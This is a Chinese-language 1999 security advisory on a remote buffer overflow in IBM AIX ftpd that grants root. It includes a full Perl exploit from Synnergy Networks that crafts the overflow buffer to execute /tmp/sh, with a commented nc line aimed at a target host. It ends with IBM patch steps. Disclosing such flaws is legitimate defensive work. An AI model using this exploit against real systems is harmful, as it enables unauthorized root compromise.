AIX ftpd存在着远程溢出漏洞
发布时间:1999-12-01
更新时间:1999-12-01
严重程度:高
威胁程度:远程管理员权限
错误类型:输入验证错误
利用方式:服务器模式
受影响系统
IBM AIX 4.3.2;4.3.1;4.3
详细描述
AIX的FTPD存在着一个远程缓冲区溢出漏洞,允许远程用户获得ROOT权限。
测试代码
#!/usr/bin/perl # *** Synnergy Networks $bufstart = 0x2ff22724; # this is our first guess $nop = "\xde\xad\xca\xfe"; $buf = "CEL "; $buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of # 'borrowed' code $buf .= pack ("N", $bufstart); # 4 $buf .= "\xd0\x04\x06\xd4"; # 8 system call.. $buf .= "\xf0\x14\x63\x5c"; # c TOC $offset = 0x10; while ($offset < 0x3c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x008); $offset += 4; while ($offset < 0x110) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x204) { $offset += 4; $buf .= $nop; } $buf .= "\x10\x01\x01\x50"; $offset += 4; while ($offset < 0x210) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x23c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x240); $offset += 4; while ($offset < 0x240) { $offset += 4; $buf .= $nop; } # this is the command that will be run through system $buf .= "/tmp/sh"; $buf .= "\n"; # offcourse you should change this . # open F, "| nc -v -v -n 192.168.2.12 21"; open F, "| od -tx1"; printf F $buf; close F; # EOF
解决方案
下载临时补丁 ftp://aix.software.ibm.com/aix/efixes/security/ftpd.tar.Z
下载后按以下步骤进行(行首的 # 为 root 提示符):
1. Uncompress and extract the fix.
# uncompress < ftpd.tar.Z | tar xf -
# cd ftpd
2. Replace the vulnerable ftpd.
# mv /usr/sbin/ftpd /usr/sbin/ftpd.before_security_fix
# chown root.system /usr/sbin/ftpd.before_security_fix
# chmod 0 /usr/sbin/ftpd.before_security_fix
# cp ./ftpd /usr/sbin/ftpd
# chown root.system /usr/sbin/ftpd
# chmod 4554 /usr/sbin/ftpd
相关信息